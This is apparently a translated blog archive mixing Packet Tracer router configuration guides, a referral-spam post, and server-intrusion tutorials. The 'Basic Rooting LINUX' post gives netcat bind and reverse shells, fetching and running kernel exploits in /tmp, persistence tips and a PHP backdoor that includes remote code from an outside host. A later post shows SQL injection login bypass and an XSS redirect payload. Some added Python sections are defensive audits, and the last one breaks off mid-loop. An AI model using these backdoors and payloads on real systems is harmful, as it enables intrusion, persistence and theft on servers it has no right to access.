Tuesday, June 12, 2012

RIP Router Configuration

This time I will share with you how to configure routers using RIP. Before we configure anything, we should look at the design to be configured; this is the one I am going to configure.


OK, this is the design I will configure; a red dot marks a device that has not been configured yet. Let's get straight to it, I bet you can't wait.. hehehe

First, decide the IP addresses for each link. For example, I'm using:

Router0 to Router1 : 10.0.0.0/8
Router1 to Router2 : 40.0.0.0/8
Router2 to Router3 : 30.0.0.0/8
Router3 to Router0 : 20.0.0.0/8

Router0 to PC : 192.168.0.0/24
Router1 to PC : 130.130.0.0/16
Router2 to PC : 50.0.0.0/8
Router3 to PC : 200.200.200.0/24

Once we have determined the IP addresses, we move on to the configuration stage. Here is the configuration:

For Router0

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 10.10.10.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 20.20.20.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 192.168.0.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

For Router1

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 10.10.10.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 40.40.40.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 130.130.130.1 255.255.0.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

For Router2

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 40.40.40.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 30.30.30.2 255.0.0.0
Router(config-if)#no shutdown
Router(config-if)#clock rate 9600
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 50.50.50.1 255.0.0.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

For Router3

Router>enable
Router#configure terminal
Router(config)#interface Serial2/0
Router(config-if)#ip address 20.20.20.2 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface Serial3/0
Router(config-if)#ip address 30.30.30.1 255.0.0.0
Router(config-if)#clock rate 9600
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#interface FastEthernet0/0
Router(config-if)#ip address 200.200.200.1 255.255.255.0
Router(config-if)#no shutdown
Router(config-if)#exit
Router(config)#

The stage of assigning IPs to the routers is done; next comes the RIP routing stage. Here is the explanation:

For Router0

Router(config)#router rip
Router(config-router)#network 10.0.0.0
Router(config-router)#network 20.0.0.0
Router(config-router)#network 192.168.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

For Router1

Router(config)#router rip
Router(config-router)#network 10.0.0.0
Router(config-router)#network 40.0.0.0
Router(config-router)#network 130.130.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

For Router2

Router(config)#router rip
Router(config-router)#network 30.0.0.0
Router(config-router)#network 40.0.0.0
Router(config-router)#network 50.0.0.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#

For Router3

Router(config)#router rip
Router(config-router)#network 20.0.0.0
Router(config-router)#network 30.0.0.0
Router(config-router)#network 200.200.200.0
Router(config-router)#exit
Router(config)#exit
Router#write
Building configuration...
[OK]
Router#
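As an added consistency check (my code, not part of the original post), the Python script below derives the classful network that a RIP `network` statement is matched against from each interface address configured above, and reports interfaces no statement covers, statements that match no interface, interface masks that differ from the classful mask (RIP version 1, the IOS default, carries no mask, so such a subnet would be advertised incorrectly), and serial links whose two ends are not in the same classful network. The router, link and `network` data are copied from the post; the checking functions are assumptions of this example.

```python
import ipaddress


def classful_network(ip):
    """Classful network containing `ip`: /8 for class A, /16 for class B,
    /24 for class C. This is what RIP version 1 summarises to and what a
    `network` statement under `router rip` is compared against."""
    first_octet = int(ip.split(".")[0])
    if first_octet < 128:
        prefix = 8
    elif first_octet < 192:
        prefix = 16
    elif first_octet < 224:
        prefix = 24
    else:
        raise ValueError(f"{ip} is not a class A, B or C unicast address")
    return ipaddress.IPv4Network((ip, prefix), strict=False)


# Interface addresses as configured in the post (address/prefix, with
# 255.0.0.0 = /8, 255.255.0.0 = /16 and 255.255.255.0 = /24).
ROUTERS = {
    "Router0": {"Serial2/0": "10.10.10.1/8", "Serial3/0": "20.20.20.1/8",
                "FastEthernet0/0": "192.168.0.1/24"},
    "Router1": {"Serial2/0": "10.10.10.2/8", "Serial3/0": "40.40.40.1/8",
                "FastEthernet0/0": "130.130.130.1/16"},
    "Router2": {"Serial2/0": "40.40.40.2/8", "Serial3/0": "30.30.30.2/8",
                "FastEthernet0/0": "50.50.50.1/8"},
    "Router3": {"Serial2/0": "20.20.20.2/8", "Serial3/0": "30.30.30.1/8",
                "FastEthernet0/0": "200.200.200.1/24"},
}

# `network` statements entered under `router rip` on each router in the post.
RIP_NETWORKS = {
    "Router0": ["10.0.0.0", "20.0.0.0", "192.168.0.0"],
    "Router1": ["10.0.0.0", "40.0.0.0", "130.130.0.0"],
    "Router2": ["30.0.0.0", "40.0.0.0", "50.0.0.0"],
    "Router3": ["20.0.0.0", "30.0.0.0", "200.200.200.0"],
}

# The four serial links of the ring: (router, interface) at each end.
LINKS = [
    (("Router0", "Serial2/0"), ("Router1", "Serial2/0")),
    (("Router1", "Serial3/0"), ("Router2", "Serial2/0")),
    (("Router2", "Serial3/0"), ("Router3", "Serial3/0")),
    (("Router3", "Serial2/0"), ("Router0", "Serial3/0")),
]


def _iface_network(router, iface):
    return classful_network(ROUTERS[router][iface].split("/")[0])


def check_router(name, rip_networks=RIP_NETWORKS):
    """Compare one router's `network` statements with its interfaces.
    Returns (uncovered, unused): interfaces whose classful network has no
    statement (RIP neither runs on them nor advertises them) and statements
    that match none of the router's interfaces (typos)."""
    iface_nets = {iface: str(_iface_network(name, iface)) for iface in ROUTERS[name]}
    stated = {str(classful_network(n)) for n in rip_networks[name]}
    uncovered = sorted(i for i, net in iface_nets.items() if net not in stated)
    unused = sorted(stated - set(iface_nets.values()))
    return uncovered, unused


def check_masks(name):
    """Interfaces whose configured prefix length is not the classful one."""
    bad = []
    for iface, cidr in ROUTERS[name].items():
        ip, prefix = cidr.split("/")
        if int(prefix) != classful_network(ip).prefixlen:
            bad.append(iface)
    return bad


def check_links(links=LINKS):
    """Serial links whose two ends fall in different classful networks."""
    return [(a, b) for a, b in links if _iface_network(*a) != _iface_network(*b)]


if __name__ == "__main__":
    for router in ROUTERS:
        print(router, "uncovered/unused:", check_router(router),
              "non-classful masks:", check_masks(router))
    print("mismatched links:", check_links())
```

All checks come back empty for the post's addressing plan; the script also accepts an alternative statement list so a typo in a `network` line shows up as an uncovered interface plus an unused statement.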

OK, if the steps above have been completed correctly, all that is left is to test with ping from the client computers. Enter IP addresses matching the router's link. For example:

PC0 : 200.200.200.2/24 gateway 200.200.200.1
PC1 : 192.168.0.2/24 gateway 192.168.0.1
PC2 : 50.50.50.2/8 gateway 50.50.50.1
PC3 : 130.130.130.2/16 gateway 130.130.130.1

If the ping shows this:

Pinging 50.50.50.2 with 32 bytes of data:

Reply from 50.50.50.2: bytes=32 time=20ms TTL=125
Reply from 50.50.50.2: bytes=32 time=9ms TTL=125
Reply from 50.50.50.2: bytes=32 time=22ms TTL=125
Reply from 50.50.50.2: bytes=32 time=11ms TTL=125

Ping statistics for 50.50.50.2:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 9ms, Maximum = 22ms, Average = 15ms

then the configuration you did has succeeded... That's it for this post; I hope it is useful for readers.. See you next posting - http://tkjonline.net

Friday, May 18, 2012

Peer to Peer Configuration


OK, now I'm going to show you how to configure peer to peer between two laptops...

Let's get straight to it:
1. Open the Cisco Packet Tracer 5.3.2 program you have installed
2. Create a network design like the following

Figure 1 : Peer to Peer System

3. We use this when, for example, we want to copy a large file from a friend, or a movie; rather than using a flash drive, it is highly recommended to use a crossover cable... I think making a crossover cable is no problem for you by now...
4. The next stage is to assign the IP ADDRESS and COMPUTER NAME...
5. For laptop 1's IP address, just double-click laptop 1 and the following display will appear...

Figure 2 : The Properties dialog box for Laptop 1

6. At this stage what we can do is set the display name; note the red box in the figure above... change your simulation name to match the one above...


7. The next stage is to assign the IP address; follow these steps...

Figure 3 : Desktop

8. Here we will assign the IP address... click the Desktop tab above and click the IP Configuration option


Figure 4 : IP Configuration

9. Set and change the IP address and subnet mask as in the figure above...
10. A /24 prefix means the subnet mask given is 255.255.255.0
11. I will try to explain subnetting in a later post...
12. When done, just close it and switch to laptop 2, and do the same thing on
13. When done, run a test by sending data with PING or a PDU; if it replies or reports successful, the configuration worked.

Well, that's it for now,, See you next time...

Computer Networking Lab

It's been a long time since I posted; I wanted to post but couldn't decide what to post about?? Then an idea came to mind: why not post a Packet Tracer tutorial.


Well, straight to it: the definition of a computer network is connecting 2 or more computers so that they can communicate with each other and share files or resources.

The transmission medium we use for now is still cable, especially UTP cable with RJ45 connectors. The problem is, when we want to practise, we have to use computers. Right? But times are not like they used to be; there is something called simulation, so we don't need to buy a hub to connect many computers, and we don't need to buy a router to connect one network to another of a different class, for example.

The program is called Packet Tracer... the latest version can be downloaded here...
It looks roughly like this..


If I'm not mistaken, this covers all the networking lessons in college, so if you're already advanced with this simulation software, there's no need to bother going to college, unless you want the bachelor's degree you're studying for. It all depends on you, haha...

I think that's enough of an introduction to Packet Tracer; next time I'll post something even better..
see you...

Monday, December 19, 2011

Free Reward from Silent Reward



Silent Rewards is the first true private rewards network ever launched. We have our own unique system that gives our members more exclusive benefits and incentives for completing offers. Our network is like no other; by featuring daily giveaways, raffles, and extraordinary contests, we are able to provide you with an experience that no other reward site can match. On top of this, we ensure top notch support through having an invitation-only community. Only those with an invite code can gain access into our network. If you are serious about making income online, Silent Rewards is for you. Do you think you have what it takes to be in our network? Get a referral code and let’s see.

Wanna register? There are a few codes:

http://www.silentrewards.com/ - Earn Points redeem anything! =)

Invite Code:
PWES8VVJWR

This website has to be the best site to earn gifts!

Some Gifts you can earn!



and those are just some of the rewards you can earn. There are tons more! So go to http://www.silentrewards.com/


Wednesday, August 24, 2011

Basic Rooting LINUX

[ Gaining Root Access ]
[ The Basics of rooting a server ]

[x] What would I expect from this tutorial?

- This tutorial is to show you the easy ways of gaining root access to a *nix server.
Most people think it's quite hard to do so; well, I am trying to prove the opposite.

[x] I am interested, go on...

- Okay, you should know at least some basics of web hacking, to gain access to the server you want to root.
If you have no idea, or have never gained access to a server before, I suggest you read some WebHacking tutorials.

I will start with some of the things you need to know in order to start rooting servers:

- Using a shell, having a good background in *nix commands, and knowing your way around a *nix server.
[ You can learn all that locally, by just installing a *nix distro and playing around with it. ]
- How to use NetCat, and listen / connect to servers using it.
[ I will cover that in this tutorial ]
- As mentioned earlier, you must have at least the basics of web hacking covered: how to gain access to a server, etc..
[ Read some WebHacking tutorials; I made a very basic one with a lot of examples covering the most used attack vectors ]

Those are the basic requirements that you should cover before starting to read this tutorial. If you feel you are missing one, look up some tutorials on it, or you can ask me.

[x] How much access do you have?

- You can't just root a server if you have an XSS on that server, unless you take that XSS to the extreme and phish with it, but that's another story.
So, we need at least the ability to upload / download / include our code, or even just execute it.

Once we have the ability to execute commands on that server, we start checking for things. This is my own checklist that I do on every server; it's just a habit now:

Check the /etc/passwd file for the users with SSH access. How do I know which have it and which do not?
Simple: by using `cat` to get the contents of that file, you will see the users on the server in this form:

user:*:501:502:x:/home/user:/bin/bash
[1]              [2]        [3]

[1] - The username | good for us to know the user to be used on cPanels, FTPs, and SSH...

[2] - Home of that username | good for cross-server hacks, where you need to get to that user's files.

[3] - Shell access | If it was anything other than:

/bin/sh
/bin/bash
/bin/zsh

Most probably it means no shell / SSH access for that user.
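Seen from the administrator's side, the same file is an audit target. The Python example below is mine, not the tutorial's: it parses constructed /etc/passwd lines using the real seven-field layout (name, password field, UID, GID, GECOS, home, shell; the tutorial's sample line is included) and reports what a review looks for: accounts with an interactive shell, any UID-0 account other than root, and shells that are neither a known login shell nor a nologin shell. The shell sets are assumptions of this example.

```python
from collections import namedtuple

# The seven colon-separated fields of an /etc/passwd line. The second field
# is the password field: "x" means the hash lives in /etc/shadow, "*" means
# there is no valid hash, so password login is impossible.
PasswdEntry = namedtuple("PasswdEntry", "name password uid gid gecos home shell")

# The three shells the tutorial treats as interactive, and the usual
# "no interactive login" shells given to service accounts (assumed sets).
INTERACTIVE_SHELLS = {"/bin/sh", "/bin/bash", "/bin/zsh"}
NOLOGIN_SHELLS = {"/sbin/nologin", "/usr/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Parse /etc/passwd content. A malformed line raises ValueError rather
    than being skipped, because an audit must not silently drop entries."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def audit(entries):
    """Three things an administrator reviews in this file:
    - accounts with an interactive shell (each should be an expected human),
    - UID-0 accounts other than root (a second superuser account is a classic
      persistence trick and should never exist),
    - shells that are neither a known login shell nor a nologin shell."""
    known = INTERACTIVE_SHELLS | NOLOGIN_SHELLS
    return {
        "interactive": [e.name for e in entries if e.shell in INTERACTIVE_SHELLS],
        "extra_uid0": [e.name for e in entries if e.uid == 0 and e.name != "root"],
        "unrecognised_shell": [e.name for e in entries if e.shell not in known],
    }


# Constructed sample, not taken from any real host; "user" is the tutorial's line.
SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
user:*:501:502:x:/home/user:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
toor:x:0:0:extra superuser:/root:/bin/bash
svc:x:600:600:service account:/srv/svc:/bin/false
legacy:x:700:700:old app:/opt/legacy:/bin/tcsh
"""

if __name__ == "__main__":
    for finding, names in audit(parse_passwd(SAMPLE)).items():
        print(f"{finding}: {names}")
```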

Now, why are we looking for users with SSH access?

Because it would make it much easier to work on that server with SSH access, to execute commands faster, etc..

Now let's say the user `user` has SSH access; we can go to his `home` and look for config files, passwords, backups, anything that will have a password,

and then try it on SSH, with the user `user` and the pass that we found. If you are lucky, you will get access.

[ Not going to explain what to do next, because we still need to complete the checklist ]

Alright, so none of the users have SSH access... we can't just give up now, can we?

If the hosting company is not that big, or if it is a private server, VPS, or dedicated server, most likely the main site of the hosting is on the same server...

That is a great thing to have, so we do a simple WHOIS on the server, check out the host, and then try to find the home dir...

Now most hosting will have billing software, or some system check panels, etc. All of those need high user access to the server, so in most cases you will find the password for admin access in plaintext.

We will be looking for config files. How to do so?

Well, we moved to the host's home, right? Let's check their files...

By listing the files there, we can see they have a folder called `billing`; let's check that out...

The first step is to get the contents of the index and look for the included files; in most cases it's just clear from the name that a file is a config file.

It will be something like:

<?php include('config.php'); ?> or <?php include('connection/db.php'); ?> or <?php include('includes/conf.php'); ?>

By getting the contents of that file, we can get the password, and try it for that user on SSH, cPanel, FTP.

[ No luck... next... ]

The hosting company has their files on another server, there are no backups whatsoever, and you are getting desperate by now...

NetCat comes to the rescue! NetCat, the TCP/IP Swiss army knife, should always be in your pocket `flash drive or whatever you use`; it is very useful..

As I promised, I will explain the usage of NetCat.. so here we go:

[ Windows ]

After downloading NetCat, open up your CMD, and move to the dir that it is located.

The commands you would need are:

nc -vv -l -p 5555

This will make NetCat listen on port 5555, verbosely `telling you exactly what is going on`. That simple, eh?

nc -vv -L -p 5555

Same thing, but with a capital L: makes it listen and, once disconnected, listen again, and again.. etc...

nc darkmindz.com 80

Connect to darkmindz.com on port 80.

nc -vv -l -p 5555 -e cmd.exe

Okay, you don't want to do that on your own PC; this would listen on port 5555, and once someone connects, it would open up cmd for them...

[ That's all you need to know about NetCat for now ]

[ *nix ]

Downloaded NetCat, compiled it, and ready to go...

Same commands; now the only difference is, since most webservers are *nix, you will need to use it as a `backdoor`, by using this command:

./nc -vv -l -p 5555 -e /bin/bash

Once connected, you have a bash command line on that server.

Alright, where does that leave us.. we still need a better way to execute commands on the server, and all our trials to get SSH access failed...

Now we are going to move into Backconnecting and Backdooring...

[ Backconnecting ]

A simple definition would be:

Making the server connect to you.

Limitations:

If the server is firewalled, or has some kind of security against remote connections, you can't use that method...

How-To:

Well, you can code your own backconnector; it is not that hard if you know C or Perl. But if you don't, you can always use the lots of backconnectors out there.

The most used tool, `at least by me`, is the Iranian backconnector, and the cyberlab one. Both are in Perl, and both work like a charm.

Of course Perl should be installed on that server to be able to use those. If Perl is installed, all you need to do is:

Use NetCat on your PC to listen on a port...

nc -vv -l -p 5555

Then, on that server, follow the instructions of your backconnector; most likely it is:

perl dc.pl your_ip_here 5555

If it connected, you will see it on your screen saying connected, and you can start executing commands.

Otherwise, you can try a C backconnect tool.. same concept, just compile and run...

[ Backdooring ]

Backdooring is opening a port on the server to connect to...

You can use NetCat in this case, and run the command:

./nc -vv -l -p 5555 -e /bin/bash

Then connect to the server using NetCat.. done..

Or use some bind shells; won't work on a lot of servers, they started banning the process... but if it works, great!
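The command lines this section shows are also what a defender looks for in a process listing: netcat started with `-e`, a bare netcat listener, and an interpreter given an IP address and port, all running under the web server's account. The Python detector below is an added example (mine, not the tutorial's) that classifies constructed `ps -eo pid,user,args` output with exactly those patterns; the sample lines, the web-account names and the labels are assumptions of the example.

```python
import re
import shlex

# Constructed process listing for illustration; not captured from any host.
SAMPLE_PS = """\
  PID USER     COMMAND
  412 root     /usr/sbin/sshd -D
  980 www-data /usr/sbin/apache2 -k start
 2311 www-data ./nc -vv -l -p 5555 -e /bin/bash
 2340 www-data perl dc.pl 203.0.113.9 5555
 2401 www-data nc -vv -l -p 5555
 2555 backup   nc mirror.example.net 80
"""

IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def parse_ps(text):
    """Return (pid, user, command line) tuples, skipping the header line."""
    rows = []
    for line in text.splitlines():
        parts = line.split(None, 2)
        if len(parts) == 3 and parts[0].isdigit():
            rows.append((int(parts[0]), parts[1], parts[2]))
    return rows


def classify(cmdline):
    """Label a command line that matches a pattern from this tutorial:
    netcat with -e (a program handed to whoever connects), a plain netcat
    listener, or perl run with an IP address and a port as arguments."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:          # unbalanced quotes: not a pattern we know
        return None
    if not argv:
        return None
    prog = argv[0].rsplit("/", 1)[-1]      # "./nc" and "/usr/bin/nc" both -> "nc"
    if prog in ("nc", "ncat", "netcat"):
        if "-e" in argv:
            return "netcat executing a program for incoming connections (-e)"
        if "-l" in argv or "-L" in argv:
            return "netcat listener"
    if prog == "perl" and len(argv) >= 4 and IPV4.fullmatch(argv[2]) and argv[3].isdigit():
        return "perl script given an IP address and port (backconnect pattern)"
    return None


def suspicious_processes(ps_text, web_users=("www-data", "apache", "nobody")):
    """Flag matching processes and note whether each runs as the web server
    account, the strongest sign that a web application was used to start it."""
    findings = []
    for pid, user, cmd in parse_ps(ps_text):
        label = classify(cmd)
        if label:
            findings.append((pid, user, label, user in web_users))
    return findings


if __name__ == "__main__":
    for pid, user, label, via_web in suspicious_processes(SAMPLE_PS):
        print(f"{pid:>6} {user:<9} web-account={via_web!s:<5} {label}")
```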

[x] So, we have been talking about how to get more access to execute commands all day now; what's next?!

Right, so backups were not found, the host is not on the same server, and if it was, all the passwords are either invalid or encrypted.

Now we move into some kernel exploits, and using the server to the max.

At least by now, you should have command line access: SSH, Backconnect, Backdoor, whatever it was...

So now you can easily execute commands on the server, but what would you do exactly?

Now it's time to get info on the server: kernel, processes, services, and then look for vulnerabilities.

We always start with the kernel, so get the kernel version by:

uname -a

It would output the hostname, OS, and then the kernel version; now we need to find an exploit for that kernel..

a good website for kernel exploits is: http://melol.free.fr/local/

Let's say you found the kernel exploit; now we need to run it. How?

Let's move to a dir that no one usually looks in, and that is /tmp/.

Now we are going to download that exploit; we can use wget for that:

wget http://melol.free.fr/local/the_name

If it says /bin/wget access denied, don't worry, we can always cURL:

curl http://melol.free.fr/local/the_name -o new_name

If that doesn't work either, remember your shell? Well, use it to upload that exploit to /tmp/.

Now to run it, we first need to give it execution perms, so we chmod it to 777:

chmod 777 new_name

Alright, now let's hope this works and run it..

./new_name

You can check if it works by checking your id, or whoami, and if it says root, you are good to go.

Alright, we covered the basic basics of getting root on a server. Rooting is not that hard; some attacking methods are hard, like BoFs, where you need C knowledge to be able to debug and exploit the processes...


[x] I don't want to lose the root!!

No one does, but a lot of people make stupid mistakes that will take the root away from them...

Rule #1 and the most important is: You NEVER change root's pass, NEVER EVER!

Create a new user with SSH access. Check the useradd command for more info.

If you used a local root exploit, make sure you have other copies of it on that server; you might need it again.

Backdoor every single site on the server with a simple PHP-Shell backdoor:


PHP Code:
<?php $config_x $_SERVER['HTTP_USER_AGENT']; if($config_x == "myb4ckd00r") { @include('http://www.darkmindz.com/shell/x2300.txt '); } ?>

Use bind shell backdoors too.

Let's Begin with Basic Hacking

Welcome to this tutorial. Please know now that, unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers: I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this.

NOTE: This tutorial has been compiled from a collection of various articles on hacking

Let's start


Recommended Tools
Port Scanner - nmap - http://nmap.org/
Browser - FireFox - http://firefox.com/
-----------------------------------------------------------------------------------
Daemon Vulnerabilities:
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows an attacker to send some sort of input to them, and they either crash or, in worse cases, run any code the attacker chooses.
-----------------------------------------------------------------------------------
Scanning For Vulnerabilites:
Well, this is where a little common sense comes in, because we need to answer one question: which ports to scan? Well, with a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open, and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time, do we? Well, nmap has us covered there, so just scan multiple ports by separating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.
[Image: nmap-portscanning-08.JPG]
-----------------------------------------------------------------------------------
Checking For Vulnerability
After your scan has finished, nmap will display the open ports on your target, along with their version (if they were identifiable, usually they are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.
-----------------------------------------------------------------------------------
Using the Exploits
This varies, depending on the language the exploit is coded in. You can google it. You can also use Metasploit. Various exploit repositories are available online, like exploit-db and inject0r, so exploits can be searched for there. Later I will also share a tutorial on using Metasploit.
-----------------------------------------------------------------------------------
NOTE: Exploits can be coded in any language, so you need good control over programming languages. To develop exploits we must have good knowledge of programming languages like C++, Perl, Python, etc. I would recommend learning C/C++ and Python because I have seen most exploits coded in them and they are easy to learn as well.

-----------------------------------------------------------------------------------

Common Web-Script Vulnerabilities

Here, I will be writing about vulnerabilities in a web server's server-sided code. Here are the topics I will be covering:
* SQL Injection
* XSS (Cross-Site Scripting)
* RFI/LFI (Remote/Local File Include)

-----------------------------------------------------------------------------------
SQL Injection: SQL injection is the act of injecting your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: bypass login verification, add a new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
Example Vulnerable Code - login.php (PHP/MySQL)
Here's an example of a vulnerable login code
PHP Code:
<?php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("<form method=post><input type=text name=u value=Username><br /><input type=password name=p value=Password><br /><input type=submit value=Login></form>");
} else {
    // the raw input is pasted straight into the query text: this is the injection point
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>

Basically what this code does is take the username and password input, and take the user's IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw a "'" into the inputs and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection, which anyone can tell you is no fun. Otherwise, it's not injectable.

The Example Exploit
Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one condition to be true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' sequence for SQL, which means it ignores everything after it; otherwise the last "'" would ruin the syntax and just cause the query to fail. You can refer to my tutorial on MySQL injection.
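As an added example (mine, not the tutorial's), here is the same query and the same `' OR 1=1--` input run in Python against an in-memory SQLite table: once built by string interpolation as login.php does, and once as a parameterised query, which is the fix. With placeholders the payload is just a password string that matches no row, and the lone-quote probe described above no longer produces a SQL error. The table contents are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the `users` table login.php queries."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, IP TEXT)")
    conn.execute("INSERT INTO users VALUES ('Administrator', 'correct-horse', '203.0.113.5')")
    return conn


def login_interpolated(conn, user, pw):
    """The query exactly as login.php builds it: input pasted into the SQL text.
    Returns True when a row comes back, i.e. when the script would say Welcome.
    AND binds tighter than OR, so `password='' OR 1=1` makes the WHERE true
    for every row and the `--` comments out the trailing quote."""
    sql = f"SELECT IP FROM users WHERE username='{user}' AND password='{pw}'"
    return conn.execute(sql).fetchone() is not None


def login_parameterised(conn, user, pw):
    """The fix: placeholders. The driver passes the values separately from the
    statement, so quotes, OR and -- inside them are data, never SQL syntax."""
    sql = "SELECT IP FROM users WHERE username=? AND password=?"
    return conn.execute(sql, (user, pw)).fetchone() is not None


def quote_breaks_query(login, conn):
    """The tutorial's probe: does a lone quote in the username raise a SQL error?"""
    try:
        login(conn, "O'Brien", "whatever")
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"
    print("interpolated, payload as password :", login_interpolated(db, "Administrator", payload))
    print("parameterised, payload as password:", login_parameterised(db, "Administrator", payload))
    print("parameterised, real password      :", login_parameterised(db, "Administrator", "correct-horse"))
    print("quote breaks interpolated query   :", quote_breaks_query(login_interpolated, db))
    print("quote breaks parameterised query  :", quote_breaks_query(login_parameterised, db))
```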

-----------------------------------------------------------------------------------

XSS (Cross-Site Scripting)
This vulnerability allows for an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time.)

Example Vulnerable Code - search.php (PHP)

PHP Code:
<?php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable.

Example Exploit Code (Redirect)
Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://abc.com/'</script>". This will output "You searched for <script>window.location='http://abc.com/'</script>. There were no results found" (HTML) and, assuming the target's browser supports JS (JavaScript), which all modern browsers do unless the setting is turned off, it will redirect them to abc.com.
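Added example, mine rather than the tutorial's: search.php's output rendered in Python two ways, unchanged as the script does and with HTML-escaping of the parameter, which is the fix for text placed in the page body. A small parser built on the standard library's HTMLParser then lists the elements a browser would create from each output, using the two inputs the tutorial uses (the `<font>` probe and the `<script>` redirect).

```python
from html import escape
from html.parser import HTMLParser


def render_search_raw(s):
    """search.php as written: the parameter is dropped into the page unchanged."""
    return f"You searched for {s}. There were no results found"


def render_search_escaped(s):
    """The fix for text inside an HTML body: encode <, >, &, ' and " so the
    browser displays them instead of parsing them as markup. Other contexts
    (attribute values, inline script, URLs) need their own encoding."""
    return f"You searched for {escape(s, quote=True)}. There were no results found"


class _TagCollector(HTMLParser):
    """Records every element a browser would create while parsing the output."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_created(page):
    parser = _TagCollector()
    parser.feed(page)
    parser.close()
    return parser.tags


# The two inputs the tutorial uses; the redirect target is the tutorial's abc.com.
PROBE = "<font color=red>XSS</font>"
REDIRECT = "<script>window.location='http://abc.com/'</script>"

if __name__ == "__main__":
    for payload in (PROBE, REDIRECT):
        print("raw     :", elements_created(render_search_raw(payload)))
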